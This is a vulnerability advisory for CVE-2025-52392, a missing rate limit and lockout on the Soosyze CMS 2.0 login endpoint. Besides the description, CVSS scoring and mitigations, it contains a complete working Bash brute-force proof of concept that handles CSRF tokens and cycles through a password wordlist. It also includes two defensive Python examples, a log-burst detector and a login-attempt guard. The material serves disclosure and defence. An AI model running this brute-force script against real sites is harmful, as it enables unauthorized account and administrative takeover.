# Brute Force Login Vulnerability in Soosyze CMS 2.0 (CVE-2025-52392)

**Author:** Beatriz Fresno Naumova (beafn28)

**Date:** 13/08/2025

**Vendor:** Soosyze

**Product:** Soosyze CMS

**Version Affected:** 2.0 (confirmed)

**Component:** /user/login – Authentication Controller

**CWE:** [CWE-307: Improper Restriction of Excessive Authentication Attempts](https://cwe.mitre.org/data/definitions/307.html)

**Attack Vector:** Remote (network exploitable)

### Description

Soosyze CMS 2.0 contains a vulnerability in the /user/login authentication endpoint that allows unlimited credential-guessing attempts due to the absence of rate limiting and account lockout mechanisms.

A remote, unauthenticated attacker can submit unlimited HTTP POST requests with varying passwords for a known username/email without triggering any throttling, delay, or lockout.

The vulnerability can be exploited using automated tools such as THC Hydra, Burp Suite Intruder, or custom scripts, enabling brute-force attacks that may lead to compromise of administrative accounts.

Testing confirmed that the server issues a valid login form and CSRF token on every request, and accepts repeated authentication attempts without introducing timing penalties or invalidating sessions.

No vendor patch or mitigation was available at the time of publication.
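As an added, defender-side example (not part of the advisory), the script below looks for the pattern described above in web server access logs: many POSTs to `/user/login` from one source inside a short window. The log lines are constructed in the common "combined" format, and the window and threshold are assumptions to tune per deployment.

```python
# Added example, not part of the advisory: flag brute-force bursts against
# /user/login in access logs. Sample lines are constructed; window and
# threshold are assumptions. The advisory notes the server returns a fresh
# login form on each attempt, so failed POSTs need not show up as 401/403:
# count POSTs per source rather than relying on the status code.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

SAMPLE_LOG = """\
203.0.113.7 - - [13/Aug/2025:10:00:01 +0000] "POST /user/login HTTP/1.1" 200 1523
203.0.113.7 - - [13/Aug/2025:10:00:02 +0000] "POST /user/login HTTP/1.1" 200 1523
198.51.100.4 - - [13/Aug/2025:10:00:02 +0000] "GET /user/login HTTP/1.1" 200 1523
203.0.113.7 - - [13/Aug/2025:10:00:03 +0000] "POST /user/login HTTP/1.1" 200 1523
203.0.113.7 - - [13/Aug/2025:10:00:04 +0000] "POST /user/login HTTP/1.1" 200 1523
198.51.100.4 - - [13/Aug/2025:10:00:09 +0000] "POST /user/login HTTP/1.1" 200 1523
203.0.113.7 - - [13/Aug/2025:10:00:05 +0000] "POST /user/login HTTP/1.1" 200 1523
203.0.113.7 - - [13/Aug/2025:10:00:06 +0000] "POST /user/login HTTP/1.1" 200 1523
""".splitlines()

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line: skip rather than crash the scan
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"].split("?", 1)[0],
            "status": int(m["status"])}

def find_bursts(lines, path="/user/login", window_s=60, threshold=5):
    """Return {ip: peak count} for sources that POST to `path` at least
    `threshold` times inside any sliding window of `window_s` seconds."""
    window = timedelta(seconds=window_s)
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            per_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged
```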

### Impact

Successful exploitation may allow:

* Account Compromise: Unauthorized access to valid user accounts.
* Administrative Takeover: Full compromise of the CMS instance if administrative credentials are obtained.
* Data Exposure/Modification: Unrestricted access to protected content and potential injection of malicious configurations or content.

### Attack Details

* Attack Vector (AV): Network (N)
* Attack Complexity (AC): Low (L)
* Privileges Required (PR): None (N)
* User Interaction (UI): Required (R)
* Scope (S): Unchanged (U)
* Confidentiality (C): Low (L)
* Integrity (I): Low (L)
* Availability (A): None (N)

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
```

**CVSS v3.1 Base Score: 5.4 (Medium)**

### Proof of Concept (PoC)

#### Overview

The following PoC demonstrates a brute-force authentication vulnerability in **Soosyze CMS 2.0** at the `/user/login` endpoint. The issue is caused by **missing rate limiting and account lockout mechanisms**, allowing an attacker to try unlimited password guesses.

#### Steps to Reproduce

1. Deploy or access a Soosyze CMS 2.0 instance.
2. Identify a valid username or email address (e.g., <test@test.com>).
3. Prepare a password dictionary (e.g., rockyou.txt).
4. Execute the provided Bash PoC script to perform automated POST login attempts.

#### PoC Script

Published PoC: <https://www.exploit-db.com/exploits/52416>

```bash
#!/usr/bin/env bash
# Author: Beatriz Fresno Naumova (beafn28)
# Usage:
#   ./script.sh [wordlist.txt]
# If no wordlist is provided, a dictionary will be used.

set -euo pipefail

BASE_URL="http://localhost:8000"
LOGIN_PATH="/user/login"
EMAIL_FIELD="email"
PASS_FIELD="password"
TARGET_EMAIL="test@test.com"

WORDLIST_FILE="${1:-}"
DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1")

form_url="$BASE_URL$LOGIN_PATH"
COOKIE_JAR="$(mktemp)"

get_form() {
    curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > /tmp/login_page.html
}

extract_token() {
    local name value
    name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/\1/p' /tmp/login_page.html | head -n1 || true)
    value=""
    if [[ -n "$name" ]]; then
        value=$(sed -nE "s/.*name=\"$name\".*value=\"([^\"]*)\".*/\1/p" /tmp/login_page.html | head -n1 || true)
    fi
    printf '%s\t%s\n' "$name" "$value"
}

post_login() {
    local pass="$1" tname="$2" tval="$3"
    curl -sS -o /tmp/resp.html -w "%{http_code}" \
        -c "$COOKIE_JAR" -b "$COOKIE_JAR" \
        -X POST "$form_url" \
        -H "Content-Type: application/x-www-form-urlencoded" \
        -H "Origin: $BASE_URL" -H "Referer: $form_url" \
        --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" \
        --data-urlencode "$PASS_FIELD=$pass" \
        $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" )
}

echo "[*] Starting brute-force attack on $form_url"
[[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}")

i=0
for pw in "${words[@]}"; do
    i=$((i+1))
    get_form
    IFS=$'\t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token)
    code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE")

    if grep -q '"redirect"' /tmp/resp.html; then
        echo -e "[$i] Password found: '\e[1m$pw\e[0m' (HTTP $code)"
        break
    else
        echo "[$i] '$pw' (HTTP $code)"
    fi

    sleep 0.$((RANDOM%9+1))
done

rm -f "$COOKIE_JAR" /tmp/resp.html
```

#### Execution example

```
./poc.sh rockyou.txt
```


### Mitigation

* Implement server-side rate limiting (e.g., maximum 5 failed attempts per minute per IP).
* Apply temporary account lockout after multiple failed attempts.
* Introduce CAPTCHA or other bot-mitigation mechanisms after repeated failed logins.
* Consider logging and monitoring repeated failed authentication attempts.
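As an added example of the first two mitigations (not Soosyze code), the guard below enforces a per-IP limit on failed attempts within a sliding window and a temporary per-account lockout, and it is consulted before the password is ever verified. The thresholds, the in-memory store and the `verify` callback are assumptions; a real deployment needs a shared store so the limits hold across PHP workers and servers.

```python
# Added example, not Soosyze code: a server-side guard implementing the
# mitigation bullets above (per-IP limit on failed attempts, temporary
# account lockout). Thresholds and the in-memory store are assumptions;
# a deployment needs a shared store so limits hold across workers.
from collections import defaultdict, deque

class LoginGuard:
    def __init__(self, max_per_ip=5, ip_window=60, max_per_account=10, lockout=900):
        self.max_per_ip, self.ip_window = max_per_ip, ip_window          # failures per IP / seconds
        self.max_per_account, self.lockout = max_per_account, lockout    # failures per account / seconds
        self.ip_failures = defaultdict(deque)     # ip -> timestamps of failed attempts
        self.account_failures = defaultdict(int)  # account -> failures since last success or lock
        self.locked_until = {}                    # account -> unlock timestamp

    def _prune(self, ip, now):
        q = self.ip_failures[ip]
        while q and now - q[0] >= self.ip_window:  # drop failures outside the window
            q.popleft()
        return q

    def allow(self, ip, account, now):
        """Call before the password check; returns (allowed, reason)."""
        if self.locked_until.get(account, 0) > now:
            return False, "account_locked"
        if len(self._prune(ip, now)) >= self.max_per_ip:
            return False, "ip_rate_limited"
        return True, "ok"

    def record(self, ip, account, success, now):
        """Call after the password check with its outcome."""
        if success:
            self.account_failures.pop(account, None)
            self.locked_until.pop(account, None)
            return
        self._prune(ip, now).append(now)
        self.account_failures[account] += 1
        if self.account_failures[account] >= self.max_per_account:
            self.locked_until[account] = now + self.lockout
            self.account_failures[account] = 0

def attempt(guard, verify, ip, account, password, now):
    """Gate a login: blocked requests never reach `verify`. The reason is for
    server-side logs; the HTTP reply should stay a uniform 'login failed'."""
    allowed, reason = guard.allow(ip, account, now)
    if not allowed:
        return False, reason
    success = verify(account, password)
    guard.record(ip, account, success, now)
    return success, "ok" if success else "invalid_credentials"
```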

### Discoverer

Beatriz Fresno Naumova (beafn28)

### References

* **CVE:** [CVE-2025-52392](https://www.cve.org/CVERecord?id=CVE-2025-52392)
* **NIST:** <https://nvd.nist.gov/vuln/detail/CVE-2025-52392>
* **Exploit Database:** <https://www.exploit-db.com/exploits/52416>
* **Public advisory:** <https://beafn28.gitbook.io/beafn28/cve/brute-force-login-vulnerability-in-soosyze-cms-2.0-cve-2025-52392>
